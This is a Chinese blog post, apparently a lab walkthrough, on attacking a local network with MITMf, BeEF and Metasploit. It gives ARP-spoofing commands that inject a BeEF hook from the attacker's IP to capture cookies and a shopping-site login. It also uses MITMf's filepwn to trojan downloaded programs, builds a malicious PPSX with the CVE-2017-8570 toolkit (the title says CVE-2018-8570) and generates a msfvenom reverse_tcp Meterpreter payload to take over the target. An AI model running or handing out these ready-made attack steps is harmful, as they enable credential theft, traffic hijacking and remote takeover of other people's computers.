小小博客,大大梦想
使用MITMF + MSF +BEEF + CVE-2018-8570实现内网渗透
安装MITMF:目前2019.1a以上的版本kali已经没有携带mitmf,需自行安装,但目前的安装方法已经失效,而我众和多种方案,查阅相关资料,成功安装,以下是我的安装方法。
a)先安装解决所需要的包依赖
apt install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
b)使用克隆的模式下载到MITMF
git clone https://github.com/byt3bl33dr/MITMF
c)进入MITMF的目录中,进行初始化本地.gitmodules文件git submodule init ,再同步远端submodule 源码git submodule update,最后使用recursive参数进行初始化子模块
cd MITMF && git submodule init && git submodule update –resursive
d)再进行安装
pip install –r requirements.txt
e)启动
注意:我在安装requirements.txt的时候,出现下面截图的错误信息
解决方案:此处的问题是没有安装python-magic使用以下命令解决
pip install python-magic && git clone https://github.com/secretsquirrel/the-backdoor-factory.git && cd the-backdoor-factory && ./install.sh
复现中间人攻击窃取浏览器页面信息
(一)实验环境:KALI,Windows 7
(二)使用工具:KALI下MITMF、Beef
查看MITMF是否安装成功,执行python mitmf.py –help,出现以下截图画面表示成功安装。
开启beef,使用beef-xss命令启动beef
自动弹出登陆界面,用户名和密码默认beef
执行
python mitmf.py --spoof --arp -i eth0 --gateway 192.168.153.2 --target 192.168.153.129 --inject --js-url http://192.168.153.128:3000/hook.js
其中–spoof是 ,–arp表示使用arp攻击,-i接自己的网卡eth0,–gateway表示网关,–targat表示目标主机,–inject表示注入,后面–js-url表示注入js后返回到链接页面。执行情况如下:
此时表示已经成功欺骗
4)当目标靶机打开浏览器访问相关网络时,便会发生xss凌空注入。使用靶机打开淘宝时候,MITMF开始运作,开始进行注入。注入成功后右击查看源代码,可以看到有一串注入成功的xss代码
此时再打开beef的网页发现有目标主机以及访问页面可获得cookie以及操作系统版本、CPU、时间、浏览器信息等
在靶机上点击登陆淘宝的个人账户
在登陆界面输入对应的用户名及密码,zhu和123456
在攻击机里面出现对应的用户名及密码
弹窗的js脚步注入
python mitmf.py --spoof --arp -i eth0 --gateway 192.168.153.2 --target 192.168.153.129 --inject --js-url http://192.168.153.128/1.js
弹框
对目标靶机浏览器进行截图,执行以下命令
python mitmf.py --spoof --arp -i eth0 --gateway 192.168.153.2 --target 192.168.153.129 --screen
启动启动msf,加载msgrpc模块
service postgresql start && msfconsole load msgrpc
为msf设置LHOST和LPORT
修改mitmf的HOST和PORT
vim /usr/share/mitmf/config/mitmf.conf
开启filepwn
mitmf --spoof --arp -i eth0 --gateway 192.168.153.2 --target 192.168.153.129 --filepwn
filepwn的原理就是在靶机下载可执行程序时将木马插入程序里,执行程序时就会启动木马,所以接下来我用靶机下载一个putty程序
接着msf监听到192.168.153.129的回应
使用sessions,查看可用模块
选择sessions 1
sessions –i 1
在此虽然拿到了meterpreter,但是,可能是我的win7版本问题或是MITMF自身问题导致没办法提权,在此这边改为利用CVE-2017-8570漏洞来提取
先生成PPSX文件
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx
–u http://192.168.153.128/logo.doc
接着生成exe的shell文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.128 LPORT=6666 -f exe > /tmp/shell.exe
接着使用mitmf的arp欺骗功能,使其打开网页便弹出下载内容
当靶机下载后,使用mtf监听端口,等待靶机连接
成功连接如图下:
拿到meterpreter,使用ipconfig命令
成功提权